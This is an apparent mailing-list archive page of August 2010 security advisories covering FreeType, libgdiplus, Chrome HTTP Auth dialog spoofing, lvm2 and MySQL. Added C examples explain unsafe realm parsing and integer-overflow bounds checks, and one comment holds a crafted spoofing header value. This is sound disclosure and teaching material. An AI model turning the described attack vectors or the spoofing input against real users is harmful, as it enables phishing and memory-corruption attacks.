[ MDVSA-2010:156 ] freetype2

2010-08-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:156
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: August 22, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in freetype2:
 
 The FT_Stream_EnterFrame function in base/ftstream.c in FreeType
 before 2.4.2 does not properly validate certain position values, which
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via a crafted font file
 (CVE-2010-2805).
 
 Array index error in the t42_parse_sfnts function in type42/t42parse.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (application crash) or possibly execute arbitrary code via
 negative size values for certain strings in FontType42 font files,
 leading to a heap-based buffer overflow (CVE-2010-2806).
 
 FreeType before 2.4.2 uses incorrect integer data types during bounds
 checking, which allows remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 font file (CVE-2010-2807).
 
 Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (memory corruption and application crash) or possibly execute
 arbitrary code via a crafted Adobe Type 1 Mac Font File (aka LWFN)
 font (CVE-2010-2808).
 
 bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause
 a denial of service (application crash) via a crafted BDF font file,
 related to an attempted modification of a value in a static string
 (CVE-2010-3053).
 
 Unspecified vulnerability in FreeType 2.3.9, and other versions
 before 2.4.2, allows remote attackers to cause a denial of service
 via vectors involving nested Standard Encoding Accented Character
 (aka seac) calls, related to psaux.h, cffgload.c, cffgload.h, and
 t1decode.c (CVE-2010-3054).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2805
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2806
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2807
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3054
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 b8ab28fadc221eeae0ea9d9d14648be6  
2008.0/i586/libfreetype6-2.3.5-2.5mdv2008.0.i586.rpm
 b1341c5c0f0ed584ce12b5076af1bfa0  
2008.0/i586/libfreetype6-devel-2.3.5-2.5mdv2008.0.i586.rpm
 b806a4715130d102ea43695fe943cadf  
2008.0/i586/libfreetype6-static-devel-2.3.5-2.5mdv2008.0.i586.rpm 
 d56c81e34ba5a646112cf7f54d1b6770  
2008.0/SRPMS/freetype2-2.3.5-2.5mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 537b00290a2d20e10bfd103a01bfbcbe  
2008.0/x86_64/lib64freetype6-2.3.5-2.5mdv2008.0.x86_64.rpm
 28178fd2d4c12cb0806f29a283b56e60  
2008.0/x86_64/lib64freetype6-devel-2.3.5-2.5mdv2008.0.x86_64.rpm
 fccebfb3e2bc0f752ef37700107db924  
2008.0/x86_64/lib64freetype6-static-devel-2.3.5-2.5mdv2008.0.x86_64.rpm 
 d56c81e34ba5a646112cf7f54d1b6770  
2008.0/SRPMS/freetype2-2.3.5-2.5mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 9c93eb065e0fb99af3c7f8e23d323ff6  
2009.0/i586/libfreetype6-2.3.7-1.4mdv2009.0.i586.rpm
 9d18899bdac168770c4d44b1e1610107  
2009.0/i586/libfreetype6-devel-2.3.7-1.4mdv2009.0.i586.rpm
 1865120e616ce57a9d8a3a91980456d3  
2009.0/i586/libfreetype6-static-devel-2.3.7-1.4mdv2009.0.i586.rpm 
 45197fd09ebbc0dd4b7f704843568d7a  
2009.0/SRPMS/freetype2-2.3.7-1.4mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 daf8318e7b97d0781fa8403145d09d8b  
2009.0/x86_64/lib64freetype6-2.3.7-1.4mdv2009.0.x86_64.rpm
 5cbfff99d66a0133a52a438a7aaeea20  
2009.0/x86_64/lib64freetype6-devel-2.3.7-1.4mdv2009.0.x86_64.rpm
 8aa86b0aba83c69d7ea2f6cef14ea420  
2009.0/x86_64/lib64freetype6-static-devel-2.3.7-1.4mdv2009.0.x86_64.rpm 
 45197fd09ebbc0dd4b7f704843568d7a  
2009.0/SRPMS/freetype2-2.3.7-1.4mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 d5a7a6e2f6ed6b27be3b4c65cf8db53f  
2009.1/i586/libfreetype6-2.3.9-1.5mdv2009.1.i586.rpm
 40a0a8d44bfe4ec11f3e997ed9edb223  
2009.1/i586/libfreetype6-devel-2.3.9-1.5mdv2009.1.i586.rpm
 02597999b4a298ab1ab3d899c56e3931  
2009.1/i586/libfreetype6-static-devel-2.3.9-1.5mdv2009.1.i586.rpm 

Secunia Research: Mono libgdiplus Image Processing Three Integer Overflows

2010-08-23 Thread Secunia Research
== 

 Secunia Research 23/08/2010

 - Mono libgdiplus Image Processing Three Integer Overflows -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* libgdiplus 2.6.7

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"Libgdiplus is the Mono library that provides a GDI+ compatible API on
non-Windows operating systems".

Product Link:
http://www.mono-project.com/Libgdiplus

== 
4) Description of Vulnerability

Secunia Research has discovered three vulnerabilities in libgdiplus 
for Mono, which can be exploited by malicious people to compromise an
application using the library.

1) An integer overflow error within the "gdip_load_tiff_image()" 
function in src/tiffcodec.c can be exploited to cause a heap-based 
buffer overflow by e.g. processing specially crafted TIFF images in 
an application using the library.

2) An integer overflow error within the 
"gdip_load_jpeg_image_internal()" function in src/jpegcodec.c can be 
exploited to cause a heap-based buffer overflow by e.g. processing 
specially crafted JPEG images in an application using the library.

3) An integer overflow error within the "gdip_read_bmp_image()"
function in src/bmpcodec.c can be exploited to cause a heap-based 
buffer overflow by e.g. processing specially crafted BMP images in an 
application using the library.

== 
5) Solution 

Do not process untrusted images in an application using the library.

== 
6) Time Table 

12/08/2010 - Vendor notified.
12/08/2010 - Vendor response.
19/08/2010 - Accidental public disclosure by an involved party. 
23/08/2010 - Public disclosure.

== 
7) Credits 

Discovered by Stefan Cornelius, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1526 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-102/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Re: 2Wire Broadband Router Session Hijacking Vulnerability

2010-08-23 Thread YGN Ethical Hacker Group
2Wire support just replied that this has been fixed and a new version
(6.x.x.x) has been released.

The advisory has been updated accordingly.

http://yehg.net/lab/pr0js/advisories/2wire/[2wire]_session_hijacking_vulnerability


Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

2010-08-23 Thread Aditya K Sood
Hi

Google Chrome (5.0.375.127 and previous versions) suffers from an HTTP
Auth dialog spoofing vulnerability due to possible realm manipulation in
the HTTP header. Previously, Google Chrome had a similar bug, which can be
seen at the following link:

http://code.google.com/p/chromium/issues/detail?id=36772

This bug was actually patched. The issue mentioned in this bug was dialog
spoofing due to long sub-domain names. The patch worked only for the
specific case which was outlined in that bug. A number of tests have been
conducted on Google Chrome which verify its inability to scrutinize the
type of realm value set in the header. It can be tampered with double
quotes and single quotes used in a definite manner.

As mentioned in RFC 2617:

"The realm directive (case-insensitive) is required for all authentication
schemes that issue a challenge. The realm value (case-sensitive), in
combination with the canonical root URL (the absolute URI for the server
whose abs_path is empty) of the server being accessed, defines the
protection space. These realms allow the protected resources on a server
to be partitioned into a set of protection spaces, each with its own
authentication scheme and/or authorization database. The realm value is a
string, generally assigned by the origin server, which may have additional
semantics specific to the authentication scheme. Note that there may be
multiple challenges with the same auth-scheme but different realms."

So, the realm value plays a critical role in determining the framework of
HTTP access authentication for a particular resource. It has been found
that it is possible to spoof the HTTP Auth dialog by playing around with
realm values. This attack scenario can be used to launch phishing attacks
and steal sensitive information from legitimate websites.

As released before, Google Chrome fails to sanitize obfuscated URLs and
redirects them to a different domain. This potential flaw can be combined
with the HTTP Auth dialog spoofing to launch attacks against legitimate
websites.

A PoC video has been released at the links below:

http://www.youtube.com/watch?v=r1KuE2th_EY
http://secniche.org/videos/goog_http_auth_realm_mani.html

(Note: a comparative test against Firefox is included in the video
itself.)


Kind Regards
Aditya K Sood
http://www.secniche.org
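The post above comes down to a browser taking the realm string from the
WWW-Authenticate header and putting it in front of the user without asking
how it was delimited. The C below is an added example, not Chrome's code
and not part of the post: a naive realm extractor that takes everything
between the first and the last double quote, beside a parser that follows
the RFC 2617 quoted-string grammar (backslash escapes, value ends at the
first unescaped quote, further parameters after a comma), and a display
filter that strips control characters and caps the length before the value
reaches a dialog. The sample challenges are constructed for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <strings.h>

/* Naive extraction: everything between the first and the last '"'.
   For  Basic realm="a", x="Google Accounts"  this yields
   a", x="Google Accounts  as the "realm", which is what a dialog would show. */
size_t naive_realm(const char *challenge, char *out, size_t outlen)
{
    const char *first = strchr(challenge, '"');
    const char *last  = strrchr(challenge, '"');
    if (!first || !last || last <= first) { out[0] = '\0'; return 0; }
    size_t n = (size_t)(last - first - 1);
    if (n >= outlen) n = outlen - 1;
    memcpy(out, first + 1, n);
    out[n] = '\0';
    return n;
}

/* RFC 2617 style parsing: parameters are name=token or name=quoted-string,
   separated by commas; inside a quoted-string a backslash escapes the next
   character and the value ends at the first unescaped '"'. Returns 1 when a
   realm parameter was found, 0 when absent or malformed (unterminated quote). */
int rfc2617_realm(const char *challenge, char *out, size_t outlen)
{
    const char *p = challenge;
    while (*p && !isspace((unsigned char)*p)) p++;        /* skip auth-scheme */
    while (*p) {
        while (*p == ' ' || *p == '\t' || *p == ',') p++;  /* skip separators */
        if (!*p) break;
        const char *name = p;
        while (*p && *p != '=' && *p != ',' && !isspace((unsigned char)*p)) p++;
        size_t namelen = (size_t)(p - name);
        if (*p != '=') return 0;                           /* malformed param */
        p++;
        int is_realm = (namelen == 5 && strncasecmp(name, "realm", 5) == 0);
        size_t n = 0;
        if (*p == '"') {
            p++;
            while (*p && *p != '"') {
                char c = *p;
                if (c == '\\' && p[1]) { p++; c = *p; }    /* quoted-pair */
                if (is_realm && n + 1 < outlen) out[n++] = c;
                p++;
            }
            if (*p != '"') return 0;                       /* unterminated */
            p++;
        } else {
            while (*p && *p != ',' && !isspace((unsigned char)*p)) {
                if (is_realm && n + 1 < outlen) out[n++] = *p;
                p++;
            }
        }
        if (is_realm) { out[n] = '\0'; return 1; }
    }
    return 0;
}

/* What a browser should do before showing the realm: replace control
   characters with spaces, collapse whitespace runs and cap the length, so the
   value can neither inject line breaks nor pad the dialog to push the real
   origin out of view. Returns the resulting length. */
size_t realm_for_display(const char *realm, char *out, size_t outlen, size_t maxlen)
{
    size_t n = 0;
    int last_space = 1;                 /* also drops leading whitespace */
    for (const char *p = realm; *p && n + 1 < outlen && n < maxlen; p++) {
        unsigned char c = (unsigned char)*p;
        int space = (c <= 0x20 || c == 0x7f);
        if (space && last_space) continue;
        out[n++] = space ? ' ' : (char)c;
        last_space = space;
    }
    while (n && out[n - 1] == ' ') n--;  /* drop trailing whitespace */
    out[n] = '\0';
    return n;
}
```

The display filter does not make the realm trustworthy; it only keeps the
string from shaping the dialog. The origin shown next to it has to come from
the connection, never from the header.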






[ MDVSA-2010:157 ] freetype2

2010-08-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:157
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: August 22, 2010
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in freetype2:
 
 The FT_Stream_EnterFrame function in base/ftstream.c in FreeType
 before 2.4.2 does not properly validate certain position values, which
 allows remote attackers to cause a denial of service (application
 crash) or possibly execute arbitrary code via a crafted font file
 (CVE-2010-2805).
 
 Array index error in the t42_parse_sfnts function in type42/t42parse.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (application crash) or possibly execute arbitrary code via
 negative size values for certain strings in FontType42 font files,
 leading to a heap-based buffer overflow (CVE-2010-2806).
 
 FreeType before 2.4.2 uses incorrect integer data types during bounds
 checking, which allows remote attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 font file (CVE-2010-2807).
 
 Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c
 in FreeType before 2.4.2 allows remote attackers to cause a denial of
 service (memory corruption and application crash) or possibly execute
 arbitrary code via a crafted Adobe Type 1 Mac Font File (aka LWFN)
 font (CVE-2010-2808).
 
 bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause
 a denial of service (application crash) via a crafted BDF font file,
 related to an attempted modification of a value in a static string
 (CVE-2010-3053).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2805
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2806
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2807
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3053
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 d959258ea6f44aab3c0befc77a4ff7ab  
2010.0/i586/libfreetype6-2.3.11-1.3mdv2010.0.i586.rpm
 74e1516ba39f185df9aed7f75782c2fa  
2010.0/i586/libfreetype6-devel-2.3.11-1.3mdv2010.0.i586.rpm
 30fb284e1517aac5d07860753cebdedd  
2010.0/i586/libfreetype6-static-devel-2.3.11-1.3mdv2010.0.i586.rpm 
 9f60d2840d038d2d007a77f297173200  
2010.0/SRPMS/freetype2-2.3.11-1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 da064231c9ed02c49b2341c86bc5460d  
2010.0/x86_64/lib64freetype6-2.3.11-1.3mdv2010.0.x86_64.rpm
 5509100ccdc3a9db75893d2c70cfec70  
2010.0/x86_64/lib64freetype6-devel-2.3.11-1.3mdv2010.0.x86_64.rpm
 e2a55e6fb6a35fa6d331bd9543df7290  
2010.0/x86_64/lib64freetype6-static-devel-2.3.11-1.3mdv2010.0.x86_64.rpm 
 9f60d2840d038d2d007a77f297173200  
2010.0/SRPMS/freetype2-2.3.11-1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 8b28c1a459c20045a8e735554fe4407d  
2010.1/i586/libfreetype6-2.3.12-1.3mdv2010.1.i586.rpm
 32fd702b42acfd0a7011770b36fdcc74  
2010.1/i586/libfreetype6-devel-2.3.12-1.3mdv2010.1.i586.rpm
 7b3575d46c7c607387fe317fb78c5a6f  
2010.1/i586/libfreetype6-static-devel-2.3.12-1.3mdv2010.1.i586.rpm 
 9a75ac1b698c9d4145fdcd1448ef30eb  
2010.1/SRPMS/freetype2-2.3.12-1.3mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 e2ebda52f9c6e2354b2184c038e3b1f6  
2010.1/x86_64/lib64freetype6-2.3.12-1.3mdv2010.1.x86_64.rpm
 227ce37797e79135d41f12771377112d  
2010.1/x86_64/lib64freetype6-devel-2.3.12-1.3mdv2010.1.x86_64.rpm
 0915a373ebf7e210997e9ba3614b4c5f  
2010.1/x86_64/lib64freetype6-static-devel-2.3.12-1.3mdv2010.1.x86_64.rpm 
 9a75ac1b698c9d4145fdcd1448ef30eb  
2010.1/SRPMS/freetype2-2.3.12-1.3mdv2010.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMcTYEmqjQ0CJFipgRAt46AJ98JG7/1G1OFwBPz9yWXC289QahBQ
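The two Mandriva FreeType advisories above (a position check in
FT_Stream_EnterFrame, "incorrect integer data types during bounds checking")
and the three libgdiplus bugs in the Secunia advisory come down to the same
thing: arithmetic on attacker-supplied sizes that wraps before it is ever
compared against anything. The C below is an added illustration, not code
from FreeType, libgdiplus, Mandriva or Secunia. It shows the two shapes side
by side, a width*height*bpp product that wraps in 32 bits and an
offset+length bounds check that wraps, each next to a hardened form. The
MAX_IMAGE_BYTES limit, the function names and the sample dimensions are
assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound on any single image buffer this decoder will allocate
   (an assumed policy value, not a limit taken from libgdiplus or FreeType). */
#define MAX_IMAGE_BYTES ((size_t)256 * 1024 * 1024)

/* The bug pattern: width * height * bytes_per_pixel evaluated in 32 bits.
   For 65537 x 65536 x 4 the true product is about 16 GiB, but the 32-bit
   result wraps to 262144, so malloc() hands back a 256 KiB buffer and the
   row-by-row copy that follows runs off the end of it. */
uint32_t wrapped_image_size(uint32_t width, uint32_t height, uint32_t bpp)
{
    return width * height * bpp;                  /* silently wraps modulo 2^32 */
}

/* Hardened version: do the arithmetic in 64 bits and refuse anything over the
   policy limit before the multiplication can get large enough to wrap even
   64 bits. Returns 1 and stores the size on success, 0 otherwise. */
int checked_image_size(uint32_t width, uint32_t height, uint32_t bpp, size_t *out)
{
    if (width == 0 || height == 0 || bpp == 0 || bpp > 16)
        return 0;
    uint64_t stride = (uint64_t)width * bpp;      /* < 2^36, cannot wrap */
    if (stride > MAX_IMAGE_BYTES)
        return 0;
    uint64_t total = stride * height;             /* < 2^28 * 2^32, cannot wrap */
    if (total > MAX_IMAGE_BYTES)
        return 0;
    *out = (size_t)total;
    return 1;
}

/* Allocate a pixel buffer only when the size survived the check. */
unsigned char *alloc_pixels(uint32_t width, uint32_t height, uint32_t bpp, size_t *size_out)
{
    size_t n;
    if (!checked_image_size(width, height, bpp, &n))
        return NULL;
    unsigned char *buf = calloc(1, n);
    if (buf && size_out) *size_out = n;
    return buf;
}

/* The second pattern, from stream readers such as a font parser: "is the
   range [pos, pos + count) inside the buffer?" written as pos + count <= size
   wraps when count is huge and lets the read through. */
int naive_range_in_bounds(uint32_t size, uint32_t pos, uint32_t count)
{
    return pos + count <= size;                   /* wraps for large count */
}

/* Compare against the remaining length instead; no addition can wrap. */
int range_in_bounds(size_t size, size_t pos, size_t count)
{
    return pos <= size && count <= size - pos;
}
```

On compilers that provide it, __builtin_mul_overflow() expresses the same
intent as the 64-bit widening in checked_image_size() without relying on the
operand ranges; the explicit version is shown here so the reasoning about
why each step cannot wrap stays visible.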

[SECURITY] [DSA 2095-1] New lvm2 packages fix denial of service

2010-08-23 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2095-1                    secur...@debian.org
http://www.debian.org/security/                          Giuseppe Iuculano
August 23, 2010                       http://www.debian.org/security/faq
- 

Package: lvm2
Vulnerability  : insecure communication protocol
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-2526
Debian Bug : 591204


Alasdair Kergon discovered that the cluster logical volume manager daemon
(clvmd) in lvm2, the Linux Logical Volume Manager, does not verify client
credentials upon a socket connection, which allows local users to cause a
denial of service.

For the stable distribution (lenny), this problem has been fixed in
version 2.02.39-8

For the testing distribution (squeeze), and the unstable distribution (sid),
this problem has been fixed in version 2.02.66-3


We recommend that you upgrade your lvm2 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8.diff.gz
Size/MD5 checksum:17393 fb9151fdf32540e15eb245389d9d5903
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39.orig.tar.gz
Size/MD5 checksum:   594342 1450ae55a89ea98e4ea51ad7f4ba22d4
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8.dsc
Size/MD5 checksum: 1132 a0c84982012567f3ca824e7bdeae7637

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_alpha.deb
Size/MD5 checksum:   256566 c326b8e851c0f32cbe8691b01cc11984
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_alpha.deb
Size/MD5 checksum:   384348 8d1385a4f8337c5526f3304c6fec1f51
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_alpha.udeb
Size/MD5 checksum:   245390 e462d169578ba15401c90dd77760b38d

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_amd64.udeb
Size/MD5 checksum:   225468 8c8e5331e9ddb80e616ae52e766007fd
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_amd64.deb
Size/MD5 checksum:   237884 a0125354fa125136d2f9ec3de006cdc2
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_amd64.deb
Size/MD5 checksum:   365790 dcc943057cd272357b6650f1eefac73a

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_armel.udeb
Size/MD5 checksum:   234540 b88dd34c0908a28233d5eadd04f85efa
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_armel.deb
Size/MD5 checksum:   366242 4c76f36b042cf9623f0083bb805133f6
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_armel.deb
Size/MD5 checksum:   237448 c8da5e5304588fc15c99b544f04e146c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_hppa.deb
Size/MD5 checksum:   392908 6b16252cf68e7059f1e30a9e476f94e8
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_hppa.deb
Size/MD5 checksum:   260256 091ed1a82e45c00754a95caa6b0baa6f
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_hppa.udeb
Size/MD5 checksum:   255674 2637ecd324df5ea0fc623feb19d1d306

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_i386.deb
Size/MD5 checksum:   355436 9d02ac68e55be8eef8d0ea1ce6b20b43
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_i386.deb
Size/MD5 checksum:   226510 f52a7348863979ed12844154c4573c10
  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_i386.udeb
Size/MD5 checksum:   208860 df9af70565f01b89e4b2739352f78222

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/l/lvm2/lvm2-udeb_2.02.39-8_ia64.udeb
Size/MD5 checksum:   322386 5ae8fba02689e5b9a694aef1dbb13057
  http://security.debian.org/pool/updates/main/l/lvm2/lvm2_2.02.39-8_ia64.deb
Size/MD5 checksum:   480774 2c556d7af51ddab5a44b2d6e5d6b3bd7
  http://security.debian.org/pool/updates/main/l/lvm2/clvm_2.02.39-8_ia64.deb
Size/MD5 c

[ MDVSA-2010:155 ] mysql

2010-08-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:155
 http://www.mandriva.com/security/
 ___

 Package : mysql
 Date: August 20, 2010
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in mysql:
 
 MySQL before 5.1.48 allows remote authenticated users with alter
 database privileges to cause a denial of service (server crash
 and database loss) via an ALTER DATABASE command with a #mysql50#
 string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or
 similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which
 causes MySQL to move certain directories to the server data directory
 (CVE-2010-2008).
 
 Additionally, many security issues noted in the 5.1.49 release notes
 have been addressed by this advisory as well, such as:
 
 * LOAD DATA INFILE did not check for SQL errors and sent an OK packet
 even when errors were already reported. Also, an assert related to
 client-server protocol checking in debug servers sometimes was raised
 when it should not have been. (Bug#52512)
 
 * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
 (SELECT ... WHERE ...) could cause a server crash. (Bug#52711)
 
 * The server could crash if there were alternate reads from two
 indexes on a table using the HANDLER interface. (Bug#54007)
 
 * A malformed argument to the BINLOG statement could result in Valgrind
 warnings or a server crash. (Bug#54393)
 
 * Incorrect handling of NULL arguments could lead to a crash for IN()
 or CASE operations when NULL arguments were either passed explicitly
 as arguments (for IN()) or implicitly generated by the WITH ROLLUP
 modifier (for IN() and CASE). (Bug#54477)
 
 * Joins involving a table with a unique SET column could cause
 a server crash. (Bug#54575)
 
 * Use of TEMPORARY InnoDB tables with nullable columns could cause
 a server crash. (Bug#54044)
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2008
 http://bugs.mysql.com/bug.php?id=52512
 http://bugs.mysql.com/bug.php?id=52711
 http://bugs.mysql.com/bug.php?id=54007
 http://bugs.mysql.com/bug.php?id=54393
 http://bugs.mysql.com/bug.php?id=54477
 http://bugs.mysql.com/bug.php?id=54575
 http://bugs.mysql.com/bug.php?id=54044
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 e0181e6f02a4d75da4844afb468a2272  
2010.0/i586/libmysql16-5.1.42-0.6mdv2010.0.i586.rpm
 90babf8758412eedecb7eb6c9881d1a9  
2010.0/i586/libmysql-devel-5.1.42-0.6mdv2010.0.i586.rpm
 217ebcccf4b1af0701bdcf042165be12  
2010.0/i586/libmysql-static-devel-5.1.42-0.6mdv2010.0.i586.rpm
 6b1a9b256eb1d1449609a9e914f7664e  
2010.0/i586/mysql-5.1.42-0.6mdv2010.0.i586.rpm
 7add987091592e974e8ae64994c82313  
2010.0/i586/mysql-bench-5.1.42-0.6mdv2010.0.i586.rpm
 a13c5bb98abb9aba82fb80dcb27e2752  
2010.0/i586/mysql-client-5.1.42-0.6mdv2010.0.i586.rpm
 8b2847d65735c38458c77153072a281e  
2010.0/i586/mysql-common-5.1.42-0.6mdv2010.0.i586.rpm
 86567fb759318246336f7077d6c13709  
2010.0/i586/mysql-common-core-5.1.42-0.6mdv2010.0.i586.rpm
 e8a3c6e59eb5321d13ad1a863465f6ef  
2010.0/i586/mysql-core-5.1.42-0.6mdv2010.0.i586.rpm
 b54c2338358f35dfb1292d615583ea2a  
2010.0/i586/mysql-doc-5.1.42-0.6mdv2010.0.i586.rpm
 1b4987ab9f81a4c0cd8e44e2bb2433c4  
2010.0/i586/mysql-max-5.1.42-0.6mdv2010.0.i586.rpm
 38c17d5f3d550d81dc14f38b7a5dc73d  
2010.0/i586/mysql-ndb-extra-5.1.42-0.6mdv2010.0.i586.rpm
 75cde53e6cc55176915cdd510419052c  
2010.0/i586/mysql-ndb-management-5.1.42-0.6mdv2010.0.i586.rpm
 522dd59860efcf76b2ecbd598e1fbba4  
2010.0/i586/mysql-ndb-storage-5.1.42-0.6mdv2010.0.i586.rpm
 a2fbac8608bd716b13b24644fc4e28c5  
2010.0/i586/mysql-ndb-tools-5.1.42-0.6mdv2010.0.i586.rpm 
 9a02ff536f50d0dec97097d94d24c7e6  
2010.0/SRPMS/mysql-5.1.42-0.6mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 dfa125382cbe6a86a3e2747c40e80556  
2010.0/x86_64/lib64mysql16-5.1.42-0.6mdv2010.0.x86_64.rpm
 968922e7d30ad10adc07e494df043f65  
2010.0/x86_64/lib64mysql-devel-5.1.42-0.6mdv2010.0.x86_64.rpm
 6fc264fa829f9e1843bfe1fa2034b7c7  
2010.0/x86_64/lib64mysql-static-devel-5.1.42-0.6mdv2010.0.x86_64.rpm
 13b2e24a215b63f36eb530b352a67ad3  
